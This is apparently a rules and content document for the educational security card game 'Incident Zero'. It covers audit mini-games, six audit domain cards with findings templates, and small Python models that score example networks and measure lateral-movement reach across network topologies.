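    mfa_for_remote_access: bool
    broad_admin_access: bool
    ids_or_ips: bool                        # Domain 3: Incident Detection
    siem: bool
    detection_covers_all_critical_segments: bool
    backup_deployed: bool                   # Domain 4: Backup & Disaster Recovery
    backup_tested: bool
    backup_geo_diverse: bool
    cloud_isolated: bool                    # Domain 5: Third-Party Risk
    cloud_handles_critical_data: bool
    centralized_logging: bool               # Domain 6: Security Ops & Monitoring


# Each predicate is the PASS line of the printed criteria table. Anything that
# does not meet it is FAIL, because v2.2 counts "PARTIAL" as FAIL.
CRITERIA = {
    "Network Segmentation": lambda n: n.firewall_between_zones or n.microsegmentation,
    "Access Control": lambda n: (n.dedicated_dc and n.mfa_for_remote_access
                                 and not n.broad_admin_access),
    "Detection": lambda n: ((n.ids_or_ips or n.siem)
                            and n.detection_covers_all_critical_segments),
    "Backup & Recovery": lambda n: (n.backup_deployed and n.backup_tested
                                    and n.backup_geo_diverse),
    "Third-Party Risk": lambda n: n.cloud_isolated or not n.cloud_handles_critical_data,
    "Operations": lambda n: n.siem and n.centralized_logging,
}


def audit(profile: NetworkProfile) -> dict[str, str]:
    """Return PASS/FAIL per domain in worksheet order."""
    return {domain: "PASS" if check(profile) else "FAIL"
            for domain, check in CRITERIA.items()}


def score(report: dict[str, str]) -> int:
    """X/6 PASS, the primary score."""
    return sum(1 for result in report.values() if result == "PASS")


# Constructed profiles transcribed from the three infrastructure descriptions.
STARTUP = NetworkProfile(
    name="Startup Tech", firewall_between_zones=False, microsegmentation=False,
    dedicated_dc=True, mfa_for_remote_access=False, broad_admin_access=False,
    ids_or_ips=False, siem=False, detection_covers_all_critical_segments=False,
    backup_deployed=True, backup_tested=False, backup_geo_diverse=False,
    cloud_isolated=False, cloud_handles_critical_data=True, centralized_logging=False,
)
MID_MARKET = NetworkProfile(
    name="Mid-Market Corp", firewall_between_zones=True, microsegmentation=False,
    dedicated_dc=True, mfa_for_remote_access=True, broad_admin_access=False,
    ids_or_ips=True, siem=True,
    detection_covers_all_critical_segments=False,   # legacy accounting segment is a blind spot
    backup_deployed=True, backup_tested=True, backup_geo_diverse=True,
    cloud_isolated=True, cloud_handles_critical_data=True, centralized_logging=True,
)
ENTERPRISE = NetworkProfile(
    name="Enterprise Bank", firewall_between_zones=True, microsegmentation=True,
    dedicated_dc=True, mfa_for_remote_access=True, broad_admin_access=False,
    ids_or_ips=True, siem=True, detection_covers_all_critical_segments=True,
    backup_deployed=True, backup_tested=True, backup_geo_diverse=True,
    cloud_isolated=True, cloud_handles_critical_data=False, centralized_logging=True,
)

if __name__ == "__main__":
    for net in (STARTUP, MID_MARKET, ENTERPRISE):
        report = audit(net)
        print(f"{net.name}: {score(report)}/6 PASS")
        for domain, result in report.items():
            print(f"  {domain:22} {result}")
```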
| Score | Assessment | Implication |
|---|---|---|
| 6/6 PASS | Enterprise-grade | Highest security, highest cost |
| 5/6 PASS | Strong security | Balanced security & cost |
| 3-4/6 PASS | Adequate but gapped | Risk exposure present |
| Below 3/6 | High risk | Vulnerabilities likely exploited |
Which team's audit assessment was most accurate?
- Teams that scored Startup as high-risk: +1 point
- Teams that scored Enterprise as low-risk: +1 point
- Teams that identified Legacy System as Mid-Market's weakness: +1 point
Winner: Team with most accurate audit assessments
Answer: No detection, no segmentation, cloud exposed
"If you had to recommend improvements to Startup, what's priority #1?"
Answer: Network segmentation OR IDS/SIEM (detection)
"Why is Enterprise Bank so expensive?"
Answer: Redundancy, microsegmentation, multiple layers of defense
"Which organization would you actually want to work for?"
Duration: 25-35 minutes
Players: 1-4 teams
Difficulty: Medium (requires both building and auditing)
Best For: Combined learning, deeper understanding
"Each team builds a simplified network by drawing random infrastructure cards. Then you audit each other's networks. Better auditors find more gaps."
This combines elements of Network Building (simplified) with Audit mechanics. Teams make trade-off decisions, then their network design is audited by competitors.
Each team builds a network using a simplified card deck:
SERVER CARDS (Draw 5 cards, must include certain types):
- Email Server (must have)
- Web Server (must have)
- Database Server (must have)
- Domain Controller (should have)
- Backup System (optional)
- Development Server (optional)
- File Server (optional)
- Cloud Workload (optional)
SECURITY DEVICE CARDS (Draw 3 cards, choose to deploy or skip):
- Firewall
- IDS
- SIEM
- Email Gateway
- WAF
- Honeypot
ARCHITECTURE CARD (Draw 1, determines layout):
- Flat Network (budget-friendly, weak)
- Segmented Network (balanced)
- Fully Isolated (expensive, strong)
Rules:
- Must have: Email, Web, Database
- Can choose: Others
- Budget: Implicit (each card represents a choice; no money tracking)
- Time: 10 minutes to decide and document on "Network Card"
Each team creates a Network Card:
TEAM A'S NETWORK:
SERVERS:
✓ Email Server
✓ Web Server
✓ Database Server
✓ Domain Controller
✓ Backup System
✓ File Server
✗ Development Server (skipped)
SECURITY DEVICES:
✓ Firewall
✓ IDS
✗ SIEM (skipped)
✓ Email Gateway
✗ WAF (skipped)
✗ Honeypot (skipped)
ARCHITECTURE:
→ Segmented (3 zones)
Each team audits a different team's network (round-robin):
Example Audit of Team A:
AUDIT OF TEAM A'S NETWORK:
Domain 1: Network Segmentation
Decision: Segmented (3 zones) → PASS
Finding: Good segmentation between DMZ, Internal, Sensitive
Domain 2: Access Control
Decision: Domain Controller present → PASS
Finding: Identity management in place
Domain 3: Detection
Decision: IDS present but NO SIEM → PARTIAL FAIL
(v2.2: "PARTIAL" counts as FAIL for the score)
Finding: Can detect network attacks but no centralized logging for correlation
Domain 4: Backup & Recovery
Decision: Backup System present → PASS
Finding: Can recover from data loss
Domain 5: Third-Party Risk
Decision: No WAF on Web Server → FAIL
Finding: Web server vulnerable to application attacks
Domain 6: Operations
Decision: No SIEM → FAIL
Finding: No centralized monitoring; incident response slower
AUDIT SCORE: 3/6 PASS
CRITICAL FINDINGS:
1. Missing SIEM (no centralized logging)
2. No WAF (web server unprotected)
3. IDS without SIEM (detection blindspot)
Accuracy of Audits is Scored:
| Audit Accuracy | Points |
|---|---|
| Identified all major gaps | +5 |
| Identified some gaps | +3 |
| Missed critical gap | -2 |
| Incorrect assessment | 0 |
Team Scores:
- Building Teams: Score = (6 - number of fails) × 5
- Example: 3/6 PASS = 3 fails → 3 × 5 = 15 points
- Auditing Teams: Score = accuracy of audit assessment
Winner: Highest combined score OR winner of each category
Duration: 20-30 minutes
Players: 2-4 teams
Difficulty: High (requires critical thinking & argumentation)
Best For: Advanced teams, strong discussion-based learning
"You're given a network design and audit findings. As a team, debate whether the auditor's findings are FAIR, HARSH, or MISSING SOMETHING. Win by making the most convincing argument."
This is a debate game where teams argue the merits of audit findings, teaching that audits are interpretable and that defending infrastructure requires understanding the rationale.
(Same fictional company as Variation A's "Startup Tech": 50 people, cloud-first, no VPN.)
SCENARIO:
Startup Tech built this network:
- Email (Cloud), Web (Cloud), Database (Cloud),
Domain Controller (On-Prem), Backup (Cloud snapshots)
- No Firewall between cloud and on-prem
- No IDS or SIEM
- No VPN (all cloud-native; cloud consoles protected by
provider logins only, no MFA)
AUDITOR'S FINDINGS:
Domain 1: Network Segmentation → FAIL
"No firewall between cloud and on-prem represents
uncontrolled lateral movement risk."
Domain 3: Detection → FAIL
"No IDS/SIEM means attacks go undetected."
OVERALL: HIGH RISK
STARTUP'S COUNTERARGUMENT:
"We use cloud providers (AWS/Azure) which have built-in
firewalls at the cloud level. Cloud provider security
groups mean only the services we expose are reachable.
Our small team (50 people) means we're faster to respond.
This audit is too harsh for a startup."
YOUR JOB:
- Is the auditor FAIR? (reasonable standards)
- Is the auditor HARSH? (too strict for context)
- Is the auditor MISSING gaps? (what should they have found?
Hint: no MFA, untested backups)
- Vote: Fair / Harsh / Missing / Balanced
SCENARIO:
Mid-Market Corp has this system:
- 15-year-old Accounting System (on-prem)
- Runs on Windows Server 2003 (unsupported, unpatched)
- Handles $2B in transactions annually
- Cannot be replaced for 2+ years (licensing/training)
- Isolated on separate network segment but bridged for
month-end consolidation
AUDITOR'S FINDINGS:
Domain 2: Access Control → FAIL
"Legacy system runs on unsupported OS. Vulnerability
present = critical risk."
Domain 4: Backup & Recovery → PARTIAL
"System backed up but no tested recovery procedure."
OVERALL: CRITICAL RISK (specifically legacy system)
CORP'S COUNTERARGUMENT:
"The system is air-gapped except for 3 days per month.
We have detective controls (IDS) watching for suspicious
access. The cost of replacement ($2M) is greater than
our risk tolerance. This system is a known risk we're
accepting."
YOUR JOB:
- Is the auditor RIGHT to flag this?
- Is the corporation taking reasonable risk?
- How would you rate this scenario? Risk Acceptance vs. Negligence?
- Vote: Auditor Correct / Corp Reasonable / Need More Controls / Acceptable Risk
SCENARIO:
Enterprise Bank built this network:
- 10+ security zones with microsegmentation
- Dual SIEM systems (Splunk + QRadar)
- IDS + IPS on every zone
- Honeypot network with decoys
- All systems hardened per NIST
- Quarterly disaster recovery testing
- Air-gapped offline backups in vault
- Annual compliance audit (PCI-DSS, SOX)
COST: $5M annual IT security budget
AUDITOR'S FINDINGS:
Domain 1-6: ALL PASS ✓
AUDITOR'S COMMENT:
"Exceptional security posture. Well-engineered
defense-in-depth. Highly resilient. Recommended
best practices for financial institution."
STAKEHOLDER QUESTION:
"Is this over-engineered? Could we achieve 80%
of the security with 30% of the cost?"
YOUR JOB:
- Is defense-in-depth always justified?
- What's the cost-benefit breakpoint?
- For different organization types (startup vs. bank),
what's appropriate?
- Vote: Over-Engineered / Justified / Right for Context / Too Expensive
TO reads:
1. Organization and network design
2. Auditor's findings
3. Organization's counterargument
4. Debate question
Each team gets assigned a position:
- Team A: Defend the Auditor (findings are fair/necessary)
- Team B: Defend the Organization (counterargument is valid)
- Team C: Play Neutral Assessor (judge fairness of both)
Teams prepare arguments:
- 2-3 key points supporting their position
- Anticipate opponent's counterarguments
- Use security/business logic
Structure:
1. Auditor Position: 1 minute opening (Team A)
2. Organization Position: 1 minute opening (Team B)
3. Cross-Examination: 2 minutes (back-and-forth)
4. Neutral Assessment: Team C (judge who had better argument)
Team C Scores:
- Most convincing argument: +3 points
- Better use of logic: +2 points
- Anticipated counterarguments: +2 points
- Clearer presentation: +1 point
Repeat for each scenario (3 scenarios = 3 rounds)
AUDITOR POSITION (Team A): "The findings are fair because:
1. Network security standards apply to all organizations
2. Cloud provider firewalls don't replace organizational controls
3. No IDS means breaches go undetected for weeks
4. A $10M breach destroys a startup; prevention is essential"
ORGANIZATION POSITION (Team B): "The counterargument is valid because:
1. Startups operate under different constraints than enterprises
2. Cloud provider security groups limit what's exposed
3. Our cloud provider has better security than we could build
4. For 50 employees, a $50K security investment is proportional
5. We're risk-accepting; this is a known trade-off"
CROSS-EXAMINATION (back and forth):
A: "But if you get compromised, your customer data is exposed. Isn't that a problem?"
B: "Yes, but our cloud provider's controls AND limited data make that less likely than you're suggesting."
A: "What about detection? If you're breached, you won't know for months."
B: "True, but adding SIEM costs $5K/month that we don't have. We're choosing early detection (IDS) instead of centralized logging."
C (NEUTRAL): "Who made the better argument?"
- Team A cited industry standards
- Team B cited resource constraints
- Both had merit
VERDICT: Team B made the slightly more convincing argument (better contextualization of risk)
- Team B: +3 points
- Team A: +2 points
After 3 scenarios:
| Team | Scenario 1 | Scenario 2 | Scenario 3 | TOTAL |
|---|---|---|---|---|
| Team A (Auditor) | 2 | 3 | 2 | 7 |
| Team B (Organization) | 3 | 2 | 2 | 7 |
| Team C (Neutral) | 3 | 2 | 3 | 8 |
Winner: Team C (Neutral Assessor)
Award: "Best Critical Thinking"
Answer: No; context matters (startup vs. bank)
"How would you defend an audit finding to the board?"
Teaching point: Audits need business justification, not just technical standards
"What's the difference between a 'critical finding' and a 'risk we're accepting'?"
Teaching point: Risk management is nuanced; not all gaps are equally important
"How does this change how you think about the attacks in Incident Response?"
Use When:
- Limited time (< 30 min session)
- First exposure to audit concepts
- Want to compare different infrastructure strategies
- Non-competitive, educational focus
Learning Value:
- Understand how audit domains work
- See difference between good/bad designs
- Low setup time
Use When:
- Want to combine building + auditing
- 30-40 minute session
- Teams benefit from designing then being audited
- Competitive element desired
Learning Value:
- Teams make trade-off decisions
- See consequences of choices reflected in audit
- "This gap I chose to accept was exactly what the auditor found!"
Use When:
- Advanced/experienced teams
- Want deep critical thinking
- Discussion-based learning preferred
- Comfortable with argumentation/debate format
Learning Value:
- Audit findings are interpretable
- Context matters (startup vs. bank)
- Security decisions involve trade-offs
- Preparation for defending security to board/leadership
Setup: 3 min
Audit Startup Tech: 4 min
Audit Mid-Market: 4 min
Audit Enterprise: 4 min
Comparison & Discussion: 3 min
Debrief: 2 min
Total: 20 minutes
Perfect for: Intro to audit concepts
Setup: 3 min
Teams build networks (simplified): 10 min
Teams audit each other: 15 min
Score & announce winner: 3 min
Debrief: 4 min
Total: 35 minutes
Perfect for: Combined learning, competitive
Setup & brief: 2 min
SCENARIO 1:
- Presentation: 1 min
- Prep: 3 min
- Debate: 5 min
- Scoring: 1 min
- Subtotal: 10 min
SCENARIO 2: 10 min
SCENARIO 3: 10 min
Debrief: 3 min
Total: 30 minutes
Perfect for: Advanced critical thinking
Variation A (Pre-Built): 20 min
- Understand audit domains via 3 sample networks
Variation B (Random Gen): 25 min
- Build network, get audited
- See your choices reflected in audit findings
Variation C (Debate): 10 min
- Single debate scenario to reinforce learning
Debrief & Connection: 5 min
- "Now you understand how audits work"
- "In Incident Response, attackers will exploit these gaps"
Total: 60 minutes
Perfect for: Comprehensive audit education
After playing Audit Standalone, teams can transition to the Incident Response module:
Narrative Bridge:
"You just audited how well different organizations designed their security. Now let's see what happens when an attacker encounters those same networks. The gaps you found in the audit? Attackers will find them too.
Your audit findings were:
- Startup Tech: HIGH RISK (no segmentation, no detection)
- Mid-Market: MEDIUM RISK (strong foundation, legacy gap)
- Enterprise: LOW RISK (defense-in-depth)
Now, if an attacker targets each of these networks, how will it go?"
Everything needed to play today is in this document: the three network descriptions, the 6-domain framework, the answer keys, the inline audit worksheet, and the three debate scenarios. Printed play aids (scoring reference card, audit worksheet, judge guide, scoring sheets): see print pack (coming).
| Variation | Duration | Complexity | Competition | Setup |
|---|---|---|---|---|
| A: Pre-Built | 15-25 min | Low | Low | Minimal |
| B: Random Gen | 25-35 min | Medium | Medium | Moderate |
| C: Debate | 20-30 min | High | High | Moderate |
After any Audit Standalone variation, teams should understand:
Key Teaching: "In Incident Response, auditors played the role of the security team. Attackers play the same role, but with opposite intent. They're looking for exactly what auditors find."
Incident Zero: Compliance Audit Standalone Mini-Games
Three variations of security assessment gameplay
Teach how audits find vulnerabilities that attackers will exploit
cards/audit-compliance/core-deck/audit-domain-cards.md
Version: 2.2 - Playtest Edition Last Updated: October 2025
Audit Domain Assessment Cards represent six critical security domains that an organization must have controls for. Each domain is assessed independently, with findings recorded on a standard audit report.
PASS/FAIL per domain (X/6) is the primary score. Stars are flavor, with this fixed mapping:
1-2★ = FAIL · 3★+ = PASS · "PARTIAL" counts as FAIL
Domain Score determines:
- Audit Grade (1-5 stars, flavor)
- PASS/FAIL status (primary — via the mapping above)
- Findings Severity (critical/major/minor)
- Modifiers for other modules (IR, DR get harder if audit failed — see the canonical table in docs/rules/module-audit-compliance.md)
Focus: How well is the network divided into protected segments?
Critical For: Preventing lateral movement
Regulatory References: PCI-DSS (network segmentation), NIST (zero trust)
What's Assessed:
- Is the network flat (1 segment) or segmented (multiple segments)?
- Are sensitive systems isolated (DMZ, database segment, admin segment)?
- Are firewall rules enforced between segments?
- Is the network architecture documented?
- Are VLANs/subnets properly configured?
Typical Findings:
- Critical (1-2 star): Flat network, no segmentation, everything can talk to everything
- Major (2-3 star): Basic segmentation exists, but enforcement is weak
- Minor (3-4 star): Segmentation exists, few rule violations
- Compliant (4-5 star): Strong segmentation, zero-trust architecture
Real-World Question: "If one system is compromised, how far can the attacker spread?"
- Flat network: Entire organization immediately
- 3-zone network: Blocked by firewalls
- Zero-trust: Individual systems isolated
Audit Evidence:
- Network diagram (shows segments)
- Firewall rule documentation
- Network ACL lists
- Proof of implementation (switch configs)
- Test results (can systems cross segments? No)
Compliance Standards:
- PCI-DSS Requirement 1: Network segmentation for cardholder data
- NIST CSF: PR.AC-5 (Network integrity protected via segmentation)
- CIS Control 12: Network Infrastructure Management (v8)
Findings Template:
FINDING: Network segmentation inadequate
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: The network is [flat/minimally segmented], allowing [lateral movement/unauthorized access]
RECOMMENDATION: Implement [VLAN/firewall rules/zero-trust] to segment [database/admin/sensitive systems]
EFFORT: [1-5] weeks
COST: [Moderate/High/Very High]
Remediation Actions:
- ✓ Implement network segmentation (ARCH-02, ARCH-03 in Network Building)
- ✓ Deploy firewall with segmentation rules (SEC-08)
- ✓ Implement zero-trust architecture (ARCH-03)
- ✓ Test segmentation enforcement
Impact if Failed (1-2 stars):
- T-04 (Lateral Movement) becomes trivial for attackers
- Incident Response: -1 to NETWORK defenses (canonical modifier)
- Disaster Recovery: -10 DR budget penalty (attacker spreads widely)
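An added example, not part of the game's own files: a small Python model of the audit evidence item "Test results (can systems cross segments?)". It constructs six hypothetical hosts (the hostnames, zones and firewall rules are made up for illustration) in the three topologies the Real-World Question names, and walks the segment-to-segment allow rules to count how many hosts an attacker who lands on one system could reach. This is the check an auditor would want to see documented, and it shows why a flat network rates 1-2 stars.

```python
from collections import deque

# Constructed inventory of six hypothetical hosts, the same in every topology.
HOSTS = ["web", "ws1", "ws2", "file", "db", "dc"]


def reachable_hosts(segments, allow, start):
    """Hosts an attacker who controls `start` can reach by pivoting.

    segments: {host: segment}; allow: set of (src_segment, dst_segment) pairs
    the firewall permits. Hosts in the same segment can always talk, which is
    exactly why a flat network puts no limit on the blast radius.
    """
    def permitted(src, dst):
        s, d = segments[src], segments[dst]
        return s == d or (s, d) in allow

    seen, queue = {start}, deque([start])
    while queue:                      # breadth-first walk over permitted flows
        cur = queue.popleft()
        for host in segments:
            if host not in seen and permitted(cur, host):
                seen.add(host)
                queue.append(host)
    return seen


# Flat network: one segment, no rules needed ("entire organization immediately").
FLAT = {h: "LAN" for h in HOSTS}
FLAT_RULES = set()

# 3-zone network: DMZ / INTERNAL / RESTRICTED with zone-level firewall rules.
THREE_ZONE = {"web": "DMZ", "ws1": "INTERNAL", "ws2": "INTERNAL",
              "file": "INTERNAL", "db": "RESTRICTED", "dc": "RESTRICTED"}
THREE_ZONE_RULES = {("INTERNAL", "DMZ"),        # users reach the web app
                    ("DMZ", "RESTRICTED")}      # web app reaches its database

# Zero-trust: every host is its own segment; only named flows are allowed.
ZERO_TRUST = {h: h for h in HOSTS}
ZERO_TRUST_RULES = {("ws1", "web"), ("ws2", "web"), ("ws1", "file"),
                    ("ws2", "file"), ("web", "db"), ("dc", "file")}

TOPOLOGIES = {"flat": (FLAT, FLAT_RULES),
              "3-zone": (THREE_ZONE, THREE_ZONE_RULES),
              "zero-trust": (ZERO_TRUST, ZERO_TRUST_RULES)}


def blast_radius(start):
    """Hosts reachable from `start` in each topology (the auditor's test result)."""
    return {name: len(reachable_hosts(seg, rules, start))
            for name, (seg, rules) in TOPOLOGIES.items()}


if __name__ == "__main__":
    for start in ("web", "ws1"):
        for name, n in blast_radius(start).items():
            print(f"{name:>10}: attacker on '{start}' reaches {n}/{len(HOSTS)} hosts")
```

Two things the counts make visible that the rubric alone does not: the zone-level rule DMZ→RESTRICTED exposes the domain controller as well as the database (a 3-zone design reaches 3 hosts from the web server, zero-trust reaches 2), and starting from a workstation the 3-zone network is fully traversable by pivoting INTERNAL→DMZ→RESTRICTED, which is the kind of rule-violation the "Test segmentation enforcement" remediation item exists to catch.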
Focus: How are user identities managed and access controlled?
Critical For: Preventing unauthorized access
Regulatory References: HIPAA (access controls), GDPR (access management)
What's Assessed:
- Is there centralized identity management (Domain Controller/Azure AD)?
- Is multi-factor authentication (MFA) enabled for sensitive access?
- Are access permissions based on least privilege?
- Are access reviews performed (verify who has access)?
- Are privileged accounts managed (admin accounts, service accounts)?
Typical Findings:
- Critical (1-2 star): No centralized identity, weak passwords, no MFA
- Major (2-3 star): Some identity management, MFA not universal
- Minor (3-4 star): Good identity management, minor gaps
- Compliant (4-5 star): Strong identity, MFA everywhere, privilege management
Real-World Question: "How easily can an attacker use stolen credentials?"
- Weak: No MFA, can use stolen password immediately
- Medium: MFA only for some systems
- Strong: MFA everywhere, weak credentials are useless
Audit Evidence:
- AD/directory configuration
- MFA enrollment status
- Access policy documentation
- Privileged account audit (who has admin?)
- Account review records (periodic access verification)
Compliance Standards:
- PCI-DSS Requirement 8: User identification and authentication
- HIPAA Rule 164.308(a)(4): Unique user identification
- NIST CSF: PR.AC-1 (Physical & logical access controls)
Findings Template:
FINDING: Multi-factor authentication not universally enforced
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: MFA is [not implemented/optional] for [VPN/email/admin access]
RECOMMENDATION: Deploy [MFA solution] to [affected systems]
EFFORT: [2-4] weeks
COST: [Low/Moderate/High]
Remediation Actions:
- ✓ Deploy MFA (D-07 in Hardening)
- ✓ Implement password vault (D-12)
- ✓ Credential Guard for privileged access (D-16)
- ✓ Access reviews quarterly
Impact if Failed (1-2 stars):
- T-03 (Compromised Credentials), T-06 (Mimikatz) become likely
- Incident Response: -1 to CREDENTIAL_ABUSE defenses (canonical modifier)
- Disaster Recovery: -15 DR budget penalty (attacker can restore themselves with stolen creds)
Focus: Can the organization detect and respond to attacks?
Critical For: Finding breaches quickly
Regulatory References: GDPR (breach detection), HIPAA (log monitoring)
What's Assessed:
- Are logs being collected centrally (SIEM or similar)?
- Is there 24/7 monitoring of critical systems?
- Are alerts configured to detect suspicious activity?
- Is there a documented incident response plan?
- Are incident responders trained?
Typical Findings:
- Critical (1-2 star): No logging, no monitoring, no incident response plan
- Major (2-3 star): Some logging, limited monitoring
- Minor (3-4 star): Good logging, some gaps in alerting
- Compliant (4-5 star): Comprehensive logging, active monitoring, trained team
Real-World Question: "How quickly will you detect an active attacker?"
- Poor: Days/weeks (after data is already stolen)
- Medium: Hours (after attacker has spread)
- Strong: Minutes (catch attacker early)
Audit Evidence:
- SIEM/logging configuration
- Alert rules documentation
- Incident response plan
- Training records (who's trained?)
- Incident history (how did you detect past incidents?)
Compliance Standards:
- GDPR Article 33: Breach notification timing (72 hours)
- HIPAA Rule 164.308(a)(6): Incident response procedures
- NIST CSF: DE.AE-3 (Event detection processes)
Findings Template:
FINDING: Insufficient threat detection and monitoring
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: [SIEM/monitoring] is [not deployed/inadequately configured]
RECOMMENDATION: Deploy [SIEM] with [alert rules] to detect [attack patterns]
EFFORT: [4-8] weeks
COST: [Moderate/High]
Remediation Actions:
- ✓ Deploy SIEM (D-09, D-22)
- ✓ Configure log centralization (D-05)
- ✓ Create SIEM correlation rules (D-10)
- ✓ Threat hunting program (D-13)
Impact if Failed (1-2 stars):
- Breach detection is late (attacker has time to steal data)
- Incident Response: -1 to Investigation rolls (canonical modifier; late detection)
- Disaster Recovery: -10 DR budget penalty (dwell time longer; more data stolen)
Optional (v2.2): a 5-star rating in this domain grants +1 to Incident Response investigation rolls if IR is played later.
Focus: Can the organization recover from attacks/disasters?
Critical For: Ransomware resilience
Regulatory References: Most breach laws mention recovery
What's Assessed:
- Is there a documented backup strategy (frequency, retention)?
- Are backups tested regularly (restore actually works)?
- Is backup storage off-site (geographically separated)?
- Are backups immutable (cannot be deleted/encrypted)?
- Is the recovery time objective (RTO) documented for each system?
Typical Findings:
- Critical (1-2 star): No backups or untested backups (may not restore)
- Major (2-3 star): Backups exist but not properly tested
- Minor (3-4 star): Backups exist and tested, gaps in immutability
- Compliant (4-5 star): 3-2-1 strategy, tested, immutable, offsite
Real-World Question: "Can you recover from ransomware?"
- Poor: No (backups are encrypted too)
- Medium: Yes but slowly (days to recover)
- Strong: Yes quickly (hours to recover, immutable backups)
Audit Evidence:
- Backup schedule/documentation
- Backup test results (prove restore works)
- Off-site backup location documentation
- Immutable backup configuration
- Recovery time estimates
Compliance Standards:
- Most breach laws assume backups exist (no recovery = massive damage)
- HIPAA Rule 164.308(a)(7): Data backup procedures
- NIST CSF: PR.IP-4 (Resilience practices documented)
Findings Template:
FINDING: Backup and recovery procedures inadequate
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: Backups are [not tested/not off-site/not immutable]
RECOMMENDATION: Implement [3-2-1 strategy] with [immutable storage]
EFFORT: [2-4] weeks
COST: [Moderate]
Remediation Actions:
- ✓ Implement 3-2-1 backup strategy (D-19)
- ✓ Test backups quarterly (prove restore works)
- ✓ Immutable storage (WORM, cloud versioning)
- ✓ Off-site backup location
Impact if Failed (1-2 stars):
- Ransomware attacks cannot be recovered from
- Disaster Recovery: -25 DR budget penalty (no recovery option; expensive rebuild)
- Business interruption is long (days vs hours)
- No IR effect (matters in Disaster Recovery)
Focus: How well are vendors and cloud services managed?
Critical For: Managing supply chain risk
Regulatory References: GDPR (processor accountability), PCI-DSS (vendor security)
What's Assessed:
- Is there a vendor management program?
- Are vendors required to meet security standards?
- Are vendor assessments conducted (security questionnaires, audits)?
- Are cloud configurations secured (IAM, encryption, monitoring)?
- Is data residency managed (where is customer data stored)?
Typical Findings:
- Critical (1-2 star): No vendor management, cloud misconfigured
- Major (2-3 star): Basic vendor management, cloud gaps
- Minor (3-4 star): Vendor management exists, minor gaps
- Compliant (4-5 star): Strong vendor program, cloud security
Real-World Question: "Is your vendor secure?"
- Poor: No idea (never asked them)
- Medium: They said they're secure (took their word)
- Strong: Assessed and monitored (ongoing verification)
Audit Evidence:
- Vendor management policy
- Vendor security questionnaires
- Cloud configuration documentation
- IAM policies for cloud access
- Data residency mapping
Compliance Standards:
- GDPR Article 28: Processor agreements (vendor security required)
- PCI-DSS Requirement 12.8: Service provider agreements
- NIST CSF: ID.SC (Supply Chain Risk Management)
Findings Template:
FINDING: Vendor and cloud security assessment inadequate
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: [Vendor/Cloud] security is [not assessed/misconfigured]
RECOMMENDATION: Implement [vendor assessment process/cloud security hardening]
EFFORT: [3-6] weeks
COST: [Low/Moderate]
Remediation Actions:
- ✓ Vendor management program (SLAs, security requirements)
- ✓ Cloud security posture management (CSPM tools)
- ✓ Cloud IAM hardening (least privilege)
- ✓ Regular vendor assessments
Impact if Failed (1-2 stars):
- SCENARIO-03 (Supply Chain Compromise) becomes likely in Disaster Recovery
- Vendor breach affects your customers
- Liability disputes (who's responsible?)
- Incident Response: -1 to WEB_EXPLOIT defenses (canonical modifier)
- Disaster Recovery: -20 DR budget penalty (cloud provider recovery needed)
Focus: How is security operationalized day to day?
Critical For: Sustained security posture
Regulatory References: Most frameworks mention continuous monitoring
What's Assessed:
- Is there a dedicated security team (CISO, analysts)?
- Are security meetings held regularly?
- Is vulnerability scanning done regularly?
- Are patches applied in a timely manner?
- Is security training conducted?
Typical Findings:
- Critical (1-2 star): No security team, no updates, no training
- Major (2-3 star): Small security team, infrequent patching
- Minor (3-4 star): Security team exists, good operations
- Compliant (4-5 star): Mature security operations, continuous improvement
Real-World Question: "Is security a priority for the organization?"
- Poor: No dedicated resources
- Medium: Part-time effort
- Strong: Dedicated team, empowered leadership
Audit Evidence:
- Org chart (is the CISO position filled?)
- Security meeting minutes
- Vulnerability scan reports
- Patch management records
- Training records
Compliance Standards:
- Most frameworks require security leadership
- NIST CSF: PR.IP-1 (Security policy established & communicated)
- CIS Control 17: Incident Response Management (v8)
Findings Template:
FINDING: Security operations maturity inadequate
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: [Security team/training/patching] is [insufficient]
RECOMMENDATION: [Hire/train/increase resources] for [security function]
EFFORT: [Ongoing]
COST: [Varies]
Remediation Actions:
- ✓ Hire CISO (if missing)
- ✓ Establish security team
- ✓ Regular vulnerability scanning
- ✓ Patch management program
- ✓ Security awareness training
Impact if Failed (1-2 stars):
- Security functions are reactive (not proactive)
- Incident Response: -1 to Investigation rolls (canonical modifier)
- Disaster Recovery: -5 DR budget penalty (forensic investigation slow)
- Vulnerabilities accumulate (PT-10 Zero-Day risk increases)
| Domain | Focus | Critical Finding | Remediation Effort | Compliance Impact |
|---|---|---|---|---|
| DOMAIN-01 | Network Segmentation | Flat network | Moderate (2-4 wk) | Lateral movement prevented |
| DOMAIN-02 | Access Control | No MFA | Low (2-4 wk) | Credential attacks harder |
| DOMAIN-03 | Threat Detection | No SIEM | High (4-8 wk) | Breach detection enabled |
| DOMAIN-04 | Backup & DR | No backups | Moderate (2-4 wk) | Ransomware resilience |
| DOMAIN-05 | Vendor Risk | No assessment | Low (3-6 wk) | Supply chain risk managed |
| DOMAIN-06 | Security Ops | No security team | High (ongoing) | Sustained security posture |
AUDIT REPORT - [Organization Name]
Audit Date: [Date]
Domains Assessed: 6
Overall Score: 2/6 PASS (stars are flavor: 1-2* = FAIL, 3*+ = PASS)
DOMAIN SCORES:
1. Network Segmentation: ⭐⭐ (2 stars) - FAIL
2. Access Control: ⭐⭐⭐ (3 stars) - PASS
3. Threat Detection: ⭐ (1 star) - FAIL (CRITICAL)
4. Backup & DR: ⭐⭐ (2 stars) - FAIL
5. Vendor Risk: ⭐⭐ (2 stars) - FAIL
6. Security Ops: ⭐⭐⭐⭐ (4 stars) - PASS
CRITICAL FINDINGS (must fix immediately):
- No SIEM or threat monitoring
- Network is completely flat (no segmentation)
MAJOR FINDINGS (fix within 30 days):
- No backup strategy
- Vendor security not assessed
- MFA not implemented
MINOR FINDINGS (fix within 90 days):
- Security training curriculum needs update
RECOMMENDATIONS:
1. Deploy SIEM immediately (critical)
2. Implement network segmentation
3. Establish backup program
4. Implement MFA
5. Develop vendor management program
(Canonical table: docs/rules/module-audit-compliance.md, v2.2)
For each failed domain (FAIL = 1-2 stars): one -1 modifier.
| Failed Domain | IR Modifier |
|---|---|
| DOMAIN-01 Segmentation | -1 to NETWORK defenses |
| DOMAIN-02 Identity | -1 to CREDENTIAL_ABUSE defenses |
